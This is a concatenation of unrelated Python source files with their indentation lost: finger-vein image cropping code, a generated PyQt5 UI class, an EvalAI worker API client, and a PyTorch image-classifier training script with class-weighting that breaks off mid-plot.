maxThresholdValue = 255
rectangleThreshold = 0.5
cropRatio = [ 1.0, 1.0, 1.0, 1.0] #y, h, x, w
invertImage = False
if "FV-USM" in className:
minThresholdValue = 40
rectangleThreshold = 0.05
cropRatio = [ 0.35, 0.75, 0.15, 0.8 ]
elif "HKPU-FV" in className:
minThresholdValue = 45
rectangleThreshold = 0.95
cropRatio = [ 0.36, 0.67, 0.15, 0.7 ]
invertImage = True
elif "IDIAP" in className:
minThresholdValue = 45
rectangleThreshold = 0.85
cropRatio = [ 0.3, 0.7, 0.15, 0.8 ]
elif "MMCBNU_6000" in className:
minThresholdValue = 20
rectangleThreshold = 0.8
cropRatio = [ 0.17, 0.84, 0.0, 0.8 ]
elif "PLUS-FV3-Laser_PALMAR" in className:
minThresholdValue = 40
rectangleThreshold = 0.2
cropRatio = [ 0.25, 0.55, 0.4, 0.6 ]
elif "SCUT_FVD" in className:
minThresholdValue = 70
rectangleThreshold = 0.6
cropRatio = [ 0.25, 0.9, 0.3, 0.75 ]
elif "SDUMLA-HMT" in className:
minThresholdValue = 50
rectangleThreshold = 0.3
cropRatio = [ 0.3, 0.75, 0.05, 0.9 ]
elif "THU-FVFDT" in className:
minThresholdValue = 65
rectangleThreshold = 0.22
cropRatio = [ 0.2, 0.7, 0.43, 0.68 ]
elif "UTFVP" in className:
minThresholdValue = 40
rectangleThreshold = 0.5
cropRatio = [ 0.3, 0.65, 0.0, 0.8 ]
else:
raise Exception("Cropping class "+className+" not implemented!")
if invertImage:
img = ~img
ret, threshed_img = cv2.threshold(img, minThresholdValue, maxThresholdValue, cv2.THRESH_BINARY)
contours, hier = cv2.findContours(threshed_img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
(imWidth, imHeight) = img.shape
imArea = imWidth * imHeight
framemax = None
frame2 = None
for c in contours:
# get the bounding rect
x, y, w, h = cv2.boundingRect(c)
# draw a green rectangle to visualize the bounding rect
#cv2.rectangle(img, (x, y), (x+w, y+h), (255, 255, 255), 2)
area = w * h
if area > maxarea:
max2 = maxarea
maxarea = area
framemax = (x,y, w, h)
if not frame2:
frame2 = framemax
elif area > max2:
max2 = area
frame2 = (x, y, w, h)
spaceA = (1.0 / imArea * maxarea)
spaceB = (1.0 / imArea * max2)
if spaceA >= rectangleThreshold:
frame2 = framemax
#print("Framemax has"+str(spaceA)+" percent space!")
elif spaceB >= rectangleThreshold:
framemax = frame2
#print("Frame2 has"+str(spaceB)+" percent space!")
#if framemax[1] > frame2[1]:
# uborder = cv2.line(img, (framemax[0], framemax[1]+framemax[3]), (framemax[0]+framemax[2], framemax[1]+framemax[3]), (255, 0, 0), 1)
# oborder = cv2.line(img, (frame2[0], frame2[1]),(frame2[0]+frame2[2], frame2[1]), (255, 0, 0), 1)
size = img.shape
if "MMCBNU_6000" in className:
cropX = 0
cropWidth = size[1]
cropY = framemax[1]
cropHeight = 0 + (framemax[1]+framemax[3])
# elif "PLUS-FV3-Laser_PALMAR" in className:
# cropX = framemax[0]
# cropWidth = framemax[0]+framemax[2]
# cropY = framemax[1]
#x cropHeight = 0 + (framemax[1]+framemax[3])
elif "SDUMLA-HMT" in className:
cropX = 0
cropWidth = size[1] - 1
cropY = frame2[1]
cropHeight = 0 + (framemax[1]+framemax[3])
elif "SCUT_FVD" in className:
cropX = framemax[0]
cropWidth = framemax[0] + framemax[2]
cropY = framemax[1]
cropHeight = framemax[1] + framemax[3]
elif "THU-FVFDT" in className:
cropX = framemax[0]
cropWidth = framemax[0] + framemax[2]
cropY = framemax[1]
cropHeight = framemax[1] + framemax[3]
else:
cropX = 0
cropWidth = size[1]
cropY = frame2[1]
cropHeight = 0 + (framemax[1]+framemax[3])
'''
if cropY >= imHeight:
print("Fehler 1")
if cropHeight >= imHeight:
print("Fehler 2")
if cropWidth >= imWidth:
#cropWidth = imWidth - 1
print("Fehler 3! KORRIGIERT")
'''
crop_img = img[cropY : cropHeight, cropX : cropWidth]
partHeight, partWidth = crop_img.shape
part_img = crop_img[math.floor(partHeight * cropRatio[0]): math.floor(partHeight * cropRatio[1]), math.floor(partWidth * cropRatio[2]): math.floor(partWidth * cropRatio[3])]
if invertImage:
part_img = ~part_img
self.data = [ Image.fromarray(part_img) ]
return self
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'GeneratorControl.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_GeneratorControlMain(object):
def setupUi(self, GeneratorControlMain):
GeneratorControlMain.setObjectName("GeneratorControlMain")
GeneratorControlMain.resize(1020, 920)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(GeneratorControlMain.sizePolicy().hasHeightForWidth())
GeneratorControlMain.setSizePolicy(sizePolicy)
self.centralwidget = QtWidgets.QWidget(GeneratorControlMain)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.MinimumExpanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.centralwidget.sizePolicy().hasHeightForWidth())
self.centralwidget.setSizePolicy(sizePolicy)
self.centralwidget.setObjectName("centralwidget")
self.sepLine = QtWidgets.QFrame(self.centralwidget)
self.sepLine.setGeometry(QtCore.QRect(10, 150, 1001, 16))
self.sepLine.setFrameShadow(QtWidgets.QFrame.Raised)
self.sepLine.setFrameShape(QtWidgets.QFrame.HLine)
self.sepLine.setObjectName("sepLine")
self.layoutWidget = QtWidgets.QWidget(self.centralwidget)
self.layoutWidget.setGeometry(QtCore.QRect(10, 830, 1001, 41))
self.layoutWidget.setObjectName("layoutWidget")
self.btnsHLayout = QtWidgets.QHBoxLayout(self.layoutWidget)
self.btnsHLayout.setContentsMargins(0, 0, 0, 0)
self.btnsHLayout.setObjectName("btnsHLayout")
spacerItem = QtWidgets.QSpacerItem(30, 20, QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Minimum)
self.btnsHLayout.addItem(spacerItem)
self.insideBtnsHLayout = QtWidgets.QHBoxLayout()
self.insideBtnsHLayout.setObjectName("insideBtnsHLayout")
self.saveBtn = QtWidgets.QPushButton(self.layoutWidget)
self.saveBtn.setObjectName("saveBtn")
self.insideBtnsHLayout.addWidget(self.saveBtn)
self.runBtn = QtWidgets.QPushButton(self.layoutWidget)
self.runBtn.setObjectName("runBtn")
self.insideBtnsHLayout.addWidget(self.runBtn)
self.exitBtn = QtWidgets.QPushButton(self.layoutWidget)
self.exitBtn.setObjectName("exitBtn")
self.insideBtnsHLayout.addWidget(self.exitBtn)
self.btnsHLayout.addLayout(self.insideBtnsHLayout)
spacerItem1 = QtWidgets.QSpacerItem(30, 20, QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Minimum)
self.btnsHLayout.addItem(spacerItem1)
self.layoutWidget1 = QtWidgets.QWidget(self.centralwidget)
self.layoutWidget1.setGeometry(QtCore.QRect(10, 10, 1001, 140))
self.layoutWidget1.setObjectName("layoutWidget1")
self.topHLayout = QtWidgets.QHBoxLayout(self.layoutWidget1)
self.topHLayout.setContentsMargins(0, 0, 0, 0)
self.topHLayout.setObjectName("topHLayout")
self.fileVLayout = QtWidgets.QVBoxLayout()
self.fileVLayout.setObjectName("fileVLayout")
self.file1HLayout = QtWidgets.QHBoxLayout()
self.file1HLayout.setObjectName("file1HLayout")
self.execHintLabel = QtWidgets.QLabel(self.layoutWidget1)
font = QtGui.QFont()
font.setPointSize(18)
self.execHintLabel.setFont(font)
self.execHintLabel.setObjectName("execHintLabel")
self.file1HLayout.addWidget(self.execHintLabel)
self.execPathEdit = QtWidgets.QLineEdit(self.layoutWidget1)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(3)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.execPathEdit.sizePolicy().hasHeightForWidth())
self.execPathEdit.setSizePolicy(sizePolicy)
self.execPathEdit.setObjectName("execPathEdit")
self.file1HLayout.addWidget(self.execPathEdit)
self.findExecBtn = QtWidgets.QToolButton(self.layoutWidget1)
self.findExecBtn.setObjectName("findExecBtn")
self.file1HLayout.addWidget(self.findExecBtn)
self.file1HLayout.setStretch(0, 3)
self.file1HLayout.setStretch(1, 3)
self.file1HLayout.setStretch(2, 3)
self.fileVLayout.addLayout(self.file1HLayout)
spacerItem2 = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum)
self.fileVLayout.addItem(spacerItem2)
self.file2HLayout = QtWidgets.QHBoxLayout()
self.file2HLayout.setObjectName("file2HLayout")
self.saveAsLabel = QtWidgets.QLabel(self.layoutWidget1)
font = QtGui.QFont()
font.setPointSize(18)
self.saveAsLabel.setFont(font)
self.saveAsLabel.setObjectName("saveAsLabel")
self.file2HLayout.addWidget(self.saveAsLabel)
self.inputPathEdit = QtWidgets.QLineEdit(self.layoutWidget1)
self.inputPathEdit.setObjectName("inputPathEdit")
self.file2HLayout.addWidget(self.inputPathEdit)
self.loadBtn = QtWidgets.QToolButton(self.layoutWidget1)
self.loadBtn.setObjectName("loadBtn")
self.file2HLayout.addWidget(self.loadBtn)
self.fileVLayout.addLayout(self.file2HLayout)
self.fileVLayout.setStretch(0, 3)
self.fileVLayout.setStretch(1, 3)
self.fileVLayout.setStretch(2, 3)
self.topHLayout.addLayout(self.fileVLayout)
spacerItem3 = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
self.topHLayout.addItem(spacerItem3)
self.logoLabel = QtWidgets.QLabel(self.layoutWidget1)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.logoLabel.sizePolicy().hasHeightForWidth())
self.logoLabel.setSizePolicy(sizePolicy)
self.logoLabel.setObjectName("logoLabel")
self.topHLayout.addWidget(self.logoLabel)
self.layoutWidget2 = QtWidgets.QWidget(self.centralwidget)
self.layoutWidget2.setGeometry(QtCore.QRect(10, 170, 1001, 651))
self.layoutWidget2.setObjectName("layoutWidget2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.layoutWidget2)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.paramLabel = QtWidgets.QLabel(self.layoutWidget2)
self.paramLabel.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.paramLabel.sizePolicy().hasHeightForWidth())
self.paramLabel.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setPointSize(18)
self.paramLabel.setFont(font)
self.paramLabel.setObjectName("paramLabel")
self.verticalLayout_2.addWidget(self.paramLabel)
self.paramTableWidget = QtWidgets.QTableWidget(self.layoutWidget2)
font = QtGui.QFont()
font.setPointSize(16)
self.paramTableWidget.setFont(font)
self.paramTableWidget.setColumnCount(6)
self.paramTableWidget.setObjectName("paramTableWidget")
self.paramTableWidget.setRowCount(0)
self.verticalLayout_2.addWidget(self.paramTableWidget)
GeneratorControlMain.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(GeneratorControlMain)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1020, 22))
self.menubar.setObjectName("menubar")
GeneratorControlMain.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(GeneratorControlMain)
self.statusbar.setObjectName("statusbar")
GeneratorControlMain.setStatusBar(self.statusbar)
self.retranslateUi(GeneratorControlMain)
QtCore.QMetaObject.connectSlotsByName(GeneratorControlMain)
GeneratorControlMain.setTabOrder(self.execPathEdit, self.findExecBtn)
GeneratorControlMain.setTabOrder(self.findExecBtn, self.inputPathEdit)
GeneratorControlMain.setTabOrder(self.inputPathEdit, self.loadBtn)
GeneratorControlMain.setTabOrder(self.loadBtn, self.paramTableWidget)
GeneratorControlMain.setTabOrder(self.paramTableWidget, self.saveBtn)
GeneratorControlMain.setTabOrder(self.saveBtn, self.runBtn)
GeneratorControlMain.setTabOrder(self.runBtn, self.exitBtn)
def retranslateUi(self, GeneratorControlMain):
_translate = QtCore.QCoreApplication.translate
GeneratorControlMain.setWindowTitle(_translate("GeneratorControlMain", "MainWindow"))
self.saveBtn.setText(_translate("GeneratorControlMain", "Save"))
self.runBtn.setText(_translate("GeneratorControlMain", "Run"))
self.exitBtn.setText(_translate("GeneratorControlMain", "Exit"))
self.execHintLabel.setText(_translate("GeneratorControlMain", "Specify the generator exectutable location:"))
self.findExecBtn.setText(_translate("GeneratorControlMain", "..."))
self.saveAsLabel.setText(_translate("GeneratorControlMain", "Load file (leave blank if saving to a new one):"))
self.loadBtn.setText(_translate("GeneratorControlMain", "..."))
self.logoLabel.setText(_translate("GeneratorControlMain", "<html><head/><body><p><img src=\":/newPrefix/logo_hi_res.jpg\" width=\"220\" height=\"110\"/></p><p> Author: Ao Liu</p></body></html>"))
self.paramLabel.setText(_translate("GeneratorControlMain", "Table of parameters: "))
import Logo_rc
|
import logging
import requests
logger = logging.getLogger(__name__)
URLS = {
"get_message_from_sqs_queue": "/api/jobs/challenge/queues/{}/",
"delete_message_from_sqs_queue": "/api/jobs/queues/{}/",
"get_submission_by_pk": "/api/jobs/submission/{}",
"get_challenge_phases_by_challenge_pk": "/api/challenges/{}/phases/",
"get_challenge_by_queue_name": "/api/challenges/challenge/queues/{}/",
"get_challenge_phase_by_pk": "/api/challenges/challenge/{}/challenge_phase/{}",
"update_submission_data": "/api/jobs/challenge/{}/update_submission/",
"get_aws_eks_bearer_token": "/api/jobs/challenge/{}/eks_bearer_token/",
"get_aws_eks_cluster_details": "/api/challenges/{}/evaluation_cluster/",
}
class EvalAI_Interface:
def __init__(self, AUTH_TOKEN, EVALAI_API_SERVER, QUEUE_NAME):
self.AUTH_TOKEN = AUTH_TOKEN
self.EVALAI_API_SERVER = EVALAI_API_SERVER
self.QUEUE_NAME = QUEUE_NAME
def get_request_headers(self):
headers = {"Authorization": "Token {}".format(self.AUTH_TOKEN)}
return headers
def make_request(self, url, method, data=None):
headers = self.get_request_headers()
try:
response = requests.request(
method=method, url=url, headers=headers, data=data
)
response.raise_for_status()
except requests.exceptions.RequestException:
logger.info(
"The worker is not able to establish connection with EvalAI"
)
raise
return response.json()
def return_url_per_environment(self, url):
base_url = "{0}".format(self.EVALAI_API_SERVER)
url = "{0}{1}".format(base_url, url)
return url
def get_message_from_sqs_queue(self):
url = URLS.get("get_message_from_sqs_queue").format(self.QUEUE_NAME)
url = self.return_url_per_environment(url)
response = self.make_request(url, "GET")
return response
def delete_message_from_sqs_queue(self, receipt_handle):
url = URLS.get("delete_message_from_sqs_queue").format(self.QUEUE_NAME)
url = self.return_url_per_environment(url)
data = {"receipt_handle": receipt_handle}
response = self.make_request(url, "POST", data) # noqa
return response
def get_submission_by_pk(self, submission_pk):
url = URLS.get("get_submission_by_pk").format(submission_pk)
url = self.return_url_per_environment(url)
response = self.make_request(url, "GET")
return response
def get_challenge_phases_by_challenge_pk(self, challenge_pk):
url = URLS.get("get_challenge_phases_by_challenge_pk").format(
challenge_pk
)
url = self.return_url_per_environment(url)
response = self.make_request(url, "GET")
return response
def get_challenge_by_queue_name(self):
url = URLS.get("get_challenge_by_queue_name").format(self.QUEUE_NAME)
url = self.return_url_per_environment(url)
response = self.make_request(url, "GET")
return response
def get_challenge_phase_by_pk(self, challenge_pk, challenge_phase_pk):
url = URLS.get("get_challenge_phase_by_pk").format(
challenge_pk, challenge_phase_pk
)
url = self.return_url_per_environment(url)
response = self.make_request(url, "GET")
return response
def update_submission_data(self, data, challenge_pk, submission_pk):
url = URLS.get("update_submission_data").format(challenge_pk)
url = self.return_url_per_environment(url)
response = self.make_request(url, "PUT", data=data)
return response
def update_submission_status(self, data, challenge_pk):
url = URLS.get("update_submission_data").format(challenge_pk)
url = self.return_url_per_environment(url)
response = self.make_request(url, "PATCH", data=data)
return response
def get_aws_eks_bearer_token(self, challenge_pk):
url = URLS.get("get_aws_eks_bearer_token").format(challenge_pk)
url = self.return_url_per_environment(url)
response = self.make_request(url, "GET")
return response
def get_aws_eks_cluster_details(self, challenge_pk):
url = URLS.get("get_aws_eks_cluster_details").format(challenge_pk)
url = self.return_url_per_environment(url)
response = self.make_request(url, "GET")
return response
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import torchvision
import torchvision.transforms as transforms
import numpy as np
import math
import matplotlib.pyplot as plt
import torch.optim as optim
from torch.utils.data import Dataset, DataLoader
from sklearn.metrics import confusion_matrix
use_cuda = torch.cuda.is_available()
print(use_cuda)
alpha=1 # AWC alpha for training
beta=1 # AWC beta AWC for inference
gamma=0.9 # AWCnew <-- (1-gamma) * AWCcurrent + gamma * AWCpast
InitLR=0.05*10**(-2)
MinLR=InitLR*0.01
MaxEpoch=400
# calculate an initial loss
epoch=-1
running_loss = 0.0
LR_factor=1 # should be 1 for non-zero Lflag
HH=20
DR=0
batch_size = 1024
MODEL_PATH = './models/'
PLOT_PATH = './plot/'
PATH='ACW1H_'+ str(HH) +'_alpha'+ str(alpha) +'_beta'+ str(beta) +'_gamma'+ str(gamma)
PATH = PATH +'_lr'+ str(InitLR) +'_bs'+ str(batch_size) +'_dr'+ str(DR)
PATH_A = MODEL_PATH + PATH + '.pth'
MaxNoClasses=10
NoTrainSamples = [5000, 5000, 5000, 5000, 5000, 5000, 5000, 5000, 5000, 5000 ] # Imbalanced Data 1
#NoTrainSamples = [500, 1000, 1500, 2000, 2500, 3000, 3500, 4000, 4500, 5000] # Imbalanced Data 2
MaxNoTrainSamples=sum(NoTrainSamples)
NoTestSamples=[1000, 1000, 1000, 1000, 1000, 1000, 1000, 1000, 1000, 1000]
#NoTestSamples=[100, 200, 300, 400, 500, 600, 700, 800, 900, 1000] # set the proportion to the NoTrainSamples
MaxNoTestSamples=sum(NoTestSamples)
criterion = nn.CrossEntropyLoss() # has softmax already and class weights may be defined
class_prob = torch.FloatTensor(NoTrainSamples)
class_prob = class_prob / sum(class_prob)
class_weights = 1 / class_prob ** alpha # initialize class-weights
class_weights = class_weights / sum(class_weights)
num_classes = MaxNoClasses
number_per_class = {}
for i in range(num_classes):
number_per_class[i] = 0
from torchvision.datasets import ImageFolder
transform = transforms.Compose([transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
trainset = ImageFolder(root='./data/Traindata-balanced', transform=transform)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=2)
testset = ImageFolder(root='./data/Testdata-balanced', transform=transform)
testloader = torch.utils.data.DataLoader(testset, batch_size=batch_size, shuffle=True, num_workers=0)
classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
class Net(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
# may add batch normailization
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, HH)
self.fc3 = nn.Linear(HH, 10)
self.dropout = nn.Dropout(DR)
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = torch.flatten(x, 1) # 배치를 제외한 모든 차원을 평탄화(flatten)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
if DR > 0.0 :
x = self.dropout(x)
x = self.fc3(x)
return x
net = Net()
LR_list = []
train_loss_list = []
test_loss_list = []
iteration_list = []
train_class_acc_list=[]
test_class_acc_list=[]
train_class_loss_list=[]
test_class_loss_list=[]
accuracy_list = []
predictions_list = []
labels_list = []
train_total_acc_list = []
train_ave_class_acc_list = []
train_std_class_acc_list = []
test_total_acc_list = []
test_ave_class_acc_list = []
test_std_class_acc_list = []
# initial loss
LR=InitLR
print('Training Start')
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print('device: ', device)
net.to(device)
if torch.cuda.device_count() > 1:
print('\n===> Training on GPU!')
net = nn.DataParallel(net)
for i, data in enumerate(trainloader, 0):
# [inputs, labels]의 목록인 data로부터 입력을 받은 후;
inputs, labels = data
inputs, labels = inputs.to(device), labels.to(device)
outputs = net(inputs)
loss = criterion(outputs, labels)
running_loss += loss.item()
# print loss for each epoch
print(epoch + 1, running_loss / MaxNoTrainSamples, LR)
# save loss
#train_loss_list.append(running_loss)
prev_loss = running_loss
LR_list.append(LR)
min_loss=999999
iepoch=0
optimizer = optim.SGD(net.parameters(), lr=InitLR, momentum=0.9)
for epoch in range(MaxEpoch): # 데이터셋을 수차례 반복합니다.
# training
running_loss = 0.0
correct_pred = {classname: 0 for classname in classes}
total_pred = {classname: 0 for classname in classes}
train_class_loss = torch.zeros(MaxNoClasses)
for i, data in enumerate(trainloader, 0):
# [inputs, labels]의 목록인 data로부터 입력을 받은 후;
inputs, labels = data
inputs, labels = inputs.to(device), labels.to(device)
# 변화도(Gradient) 매개변수를 0으로 만들고
optimizer.zero_grad()
# 순전파 + 역전파 + 최적화를 한 후
outputs = net(inputs)
outputs = outputs.to(device)
class_weights = class_weights.to(device)
criterion = nn.CrossEntropyLoss(weight=class_weights, reduce=False, reduction='none')
# get lotal and class losses
loss = criterion(outputs, labels)
loss = loss.to(device)
for label, one_loss in zip(labels, loss):
train_class_loss = train_class_loss.to(device)
train_class_loss[label] += one_loss
# add loss
loss=sum(loss)
running_loss += loss.item()
# backprop and weight adjustment
loss.backward()
optimizer.step()
# check accuracy
_, predictions = torch.max(outputs, 1)
for label, prediction in zip(labels, predictions):
if label == prediction:
correct_pred[classes[label]] += 1
total_pred[classes[label]] += 1
# get lists
running_loss=running_loss/MaxNoTrainSamples
print('Training ',epoch + 1, running_loss, LR)
print("Class Weights: ",class_weights)
# save loss
train_loss_list.append(running_loss)
LR_list.append(LR)
# reduce learning rate if loss increases
if prev_loss < running_loss :
LR=LR*LR_factor
optimizer = optim.SGD(net.parameters(), lr=LR, momentum=0.9)
prev_loss = running_loss
# save the best model
if running_loss < min_loss :
min_loss=running_loss
PATH_B = MODEL_PATH + PATH +'_Best.pth'
#torch.save(net.state_dict(), PATH)
#torch.save(net, PATH_B)
# training accuracy check
# total and class accuracy
sum_correct_count = 0
sum_class_accuracy = 0
sum_class_acc_sq = 0
sum_total_count = 0
# get class accuracy
ii=0
train_class_acc_list.append([0,0,0,0,0,0,0,0,0,0])
for classname, correct_count in correct_pred.items():
accuracy = 100 * float(correct_count) / total_pred[classname]
#print(" Accuracy for class {:5s} is: {:.1f} %".format(classname,accuracy), end='')
print(' ',accuracy, end='')
sum_correct_count += correct_count
sum_total_count += total_pred[classname]
sum_class_accuracy += accuracy
sum_class_acc_sq += accuracy * accuracy
train_class_acc_list[iepoch][ii] = accuracy
ii += 1
print('')
# average of class accucaries
total_accuracy = 100 * float(sum_correct_count) / sum_total_count
ave_class_accuracy = sum_class_accuracy / len(classes)
std_class_accuracy = math.sqrt(sum_class_acc_sq / len(classes) - ave_class_accuracy * ave_class_accuracy)
print(" Average Class Accuracy is: {:.1f} %".format(ave_class_accuracy))
print(" STD of Class Accuracy is: {:.1f} %".format(std_class_accuracy))
print(" Weighted Accuracy is: {:.1f} %".format(total_accuracy))
train_total_acc_list.append(total_accuracy)
train_ave_class_acc_list.append(ave_class_accuracy)
train_std_class_acc_list.append(std_class_accuracy)
# --------------------------------------------------------------------
# performace testing for all test data
test_running_loss = 0.0
correct_pred = {classname: 0 for classname in classes}
total_pred = {classname: 0 for classname in classes}
test_class_loss = torch.zeros(MaxNoClasses)
with torch.no_grad():
for data in testloader:
images, labels = data
images, labels = images.to(device), labels.to(device)
outputs = net(images)
criterion = nn.CrossEntropyLoss(weight=class_weights, reduce=False, reduction='none')
loss = criterion(outputs, labels)
for label, one_loss in zip(labels, loss):
test_class_loss[label] = test_class_loss[label] + one_loss
loss=sum(loss)
test_running_loss += loss.item()
_, predictions = torch.max(outputs, 1)
for label, prediction in zip(labels, predictions):
if label == prediction:
correct_pred[classes[label]] += 1
total_pred[classes[label]] += 1
test_running_loss=test_running_loss / MaxNoTestSamples
print('Test ',epoch + 1, test_running_loss, LR)
test_loss_list.append(test_running_loss)
# total and class accuracy
sum_correct_count = 0
sum_class_accuracy = 0
sum_class_acc_sq = 0
sum_total_count = 0
# get class accuracy
ii=0
test_class_acc_list.append([0,0,0,0,0,0,0,0,0,0])
for classname, correct_count in correct_pred.items():
accuracy = 100 * float(correct_count) / total_pred[classname]
sum_class_accuracy += accuracy
sum_class_acc_sq += accuracy * accuracy
#weighted accuracy
#sum_total_count += total_pred[classname]
sum_correct_count += correct_count
test_class_acc_list[iepoch][ii] = accuracy
ii += 1
#print(" Accuracy for class {:5s} is: {:.1f} %".format(classname,accuracy), end='')
print(' ',accuracy, end='')
print('')
# average of class accucaries
ave_class_accuracy = sum_class_accuracy / len(classes)
std_class_accuracy = math.sqrt(sum_class_acc_sq / len(classes) - ave_class_accuracy * ave_class_accuracy)
#weighred accuracy
total_accuracy = 100*float(sum_correct_count) /MaxNoTestSamples
print(" Average Class Accuracy is: {:.1f} %".format(ave_class_accuracy))
print(" STD of Class Accuracy is: {:.1f} %".format(std_class_accuracy))
print(" Weighted Accuracy is: {:.1f} %".format(total_accuracy))
test_total_acc_list.append(total_accuracy)
test_ave_class_acc_list.append(ave_class_accuracy)
test_std_class_acc_list.append(std_class_accuracy)
# prepare for the next epoch
iepoch +=1
train_class_loss_list.append(train_class_loss)
test_class_loss_list.append(test_class_loss)
with torch.no_grad():
dummy = train_class_loss ** beta
dummy = dummy/sum(dummy)
class_weights = (1 - gamma) * dummy + gamma * class_weights
print('Finished Training: '+ PATH)
# save state_dict
torch.save(net.state_dict(), PATH_A)
# load state_dict
net = Net()
#net=TheModelClass(*args, **kwargs)
net.load_state_dict(torch.load(PATH_A))
#net.eval()
# In[ ]:
# save each variables
'''
torch.save(train_loss_list,'train_loss_list'+PATH+'.pth')
torch.save(test_loss_list,'test_loss_list'+PATH+'.pth')
torch.save(train_class_loss_list,'train_class_loss_list'+PATH+'.pth')
torch.save(test_class_loss_list,'test_class_loss_list'+PATH+'.pth')
torch.save(train_total_acc_list,'train_total_acc_list'+PATH+'.pth')
torch.save(test_total_acc_list,'test_total_acc_list'+PATH+'.pth')
torch.save(train_ave_class_acc_list,'train_ave_class_acc_list'+PATH+'.pth')
torch.save(test_ave_class_acc_list,'test_ave_class_acc_list'+PATH+'.pth')
torch.save(train_std_class_acc_list,'train_std_class_acc_list'+PATH+'.pth')
torch.save(test_std_class_acc_list,'test_std_class_acc_list'+PATH+'.pth')
# load each variables
train_loss_list=torch.load('train_loss_list'+PATH+'.pth')
test_loss_list=torch.load('test_loss_list'+PATH+'.pth')
train_class_loss_list=torch.load('train_class_loss_list'+PATH+'.pth')
test_class_loss_list=torch.load('test_class_loss_list'+PATH+'.pth')
train_total_acc_list=torch.load('train_total_acc_list'+PATH+'.pth')
test_total_acc_list=torch.load('test_total_acc_list'+PATH+'.pth')
train_ave_class_acc_list=torch.load('train_ave_class_acc_list'+PATH+'.pth')
test_ave_class_acc_list=torch.load('test_ave_class_acc_list'+PATH+'.pth')
train_std_class_acc_list=torch.load('train_std_class_acc_list'+PATH+'.pth')
test_std_class_acc_list=torch.load('test_std_class_acc_list'+PATH+'.pth')
'''
# Plot loss learning curves
x = np.arange(1,MaxEpoch+1,1)
fig, ax =plt.subplots()
ax.plot(x,train_loss_list,'r',label='Total Loss for Train Data')
ax.plot(x,test_loss_list,'g',label='Total Loss for Test Data')
legend = ax.legend(loc='upper right', shadow=False, fontsize='small')
ax.set(xlabel='Epoch', ylabel='Loss',
title='Training and Test Loss during Learning')
fig.savefig(PLOT_PATH+"PLOT_PATHLearning Loss Curves-"+PATH+'.png',dpi=200)
# In[ ]:
# Plot accuracy learning curves
x = np.arange(1,MaxEpoch+1,1)
fig, ax =plt.subplots()
ax.plot(x,train_total_acc_list,'r',label='Total Acc for Train Data')
ax.plot(x,test_total_acc_list,'g',label='Total Acc for Test Data')
ax.plot(x,train_ave_class_acc_list,'r--',label='Ave Accuracy for Train Data')
ax.plot(x,test_ave_class_acc_list,'g--',label='Ave Accuracy for Test Data')
ax.plot(x,train_std_class_acc_list,'r:',label='Std Acc for Train Data')
ax.plot(x,test_std_class_acc_list,'g:',label='Std Acc for Test Data')
legend = ax.legend(loc='center right', shadow=False, fontsize='small')
ax.set(xlabel='Epoch', ylabel='Accuracy (%)',
title='Total, Average, and STD Accuracies during Learning')
fig.savefig(PLOT_PATH+"Learning Accuracy Curves: " +PATH+'.png',dpi=200)
# In[ ]:
# Plot class accuracy learning curves
x = np.arange(1,MaxEpoch+1,1)
fig, ax =plt.subplots()
trans_list=np.transpose(train_class_acc_list)
ax.plot(x,trans_list[0],'#8c564b',label='plane')
ax.plot(x,trans_list[1],'#d62728',label='var')
ax.plot(x,trans_list[2],'#ff7f0e',label='bird')
ax.plot(x,trans_list[3],'#bcbd22',label='cat')
ax.plot(x,trans_list[4],'#2ca02c',label='deer')
ax.plot(x,trans_list[5],'#17becf',label='dog')
